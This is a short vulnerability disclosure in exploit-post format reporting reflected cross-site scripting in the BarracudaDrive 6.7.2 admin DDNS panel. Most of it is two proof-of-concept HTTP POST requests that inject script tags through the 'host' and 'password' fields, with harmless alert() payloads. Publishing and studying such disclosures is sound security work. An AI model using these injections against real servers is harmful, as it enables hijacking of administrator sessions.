############################################################################### #Exploit Title : BarracudaDrive 6.7.2 Administrator Panel Rflected Cross-Site Scripting #Author : Govind Singh aka NullCool #Vendor : http://barracudadrive.com #Software : BarracudaDrive 6.7.2 #Date : 15/06/2014 #Discovered At : IHT Lab ( 1ND14N H4X0R5 T34M ) #Love to : error1046, DeadMan India, CyberGladiator, Amit Kumar Achina ################################################################################ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --=={ >:)o Overview of vulnerability o(:< }==-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ BarracudaDrive Multiple Reflected Cross-Site Scripting in ddns panel Reflected Cross-Site Scripting Vulnerabilities in BarracudaDrive, user input is not properly checked before submission. 1) "host" parameter to "/rtl/protected/admin/ddns/" is not properly verified before submission. This can be exploited to execute arbitrary scripts code. 2) "password" parameter to "/rtl/protected/admin/ddns/" is not properly verified before submission. This can be exploited to execute arbitrary scripts code. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --=={ >:)o Proof of Concept: o(:< }==-- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1). Host=localhost:9357 User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=en-US,en;q=0.5 Accept-Encoding=gzip, deflate Referer=http://localhost:9357/rtl/protected/admin/ddns/ Cookie=tzone=--330; __utma=111872281.147155010.1402786769.1402791987.1402794883.3; __utmz=111872281.1402786769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=111872281.3.10.1402794883; z9ZAqJtI=d4efe303539cfccc; __utmc=111872281 Connection=keep-alive Content-Type=application/x-www-form-urlencoded Content-Length=81 POSTDATA=provider=DNSdynamic&host="><script>alert(123);</script>&username=%3E&password=%3E Poc image : http://prntscr.com/3sym87 2). Host=localhost:9357 User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=en-US,en;q=0.5 Accept-Encoding=gzip, deflate Referer=http://localhost:9357/rtl/protected/admin/ddns/ Cookie=tzone=--330; __utma=111872281.147155010.1402786769.1402791987.1402794883.3; __utmz=111872281.1402786769.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=111872281.3.10.1402794883; z9ZAqJtI=d4efe303539cfccc; __utmc=111872281 Connection=keep-alive Content-Type=application/x-www-form-urlencoded Content-Length=78 POSTDATA=provider=DNSdynamic&host=&username=%3E&password="><script>alert('Govind Singh');</script> Poc Image : http://prntscr.com/3symgz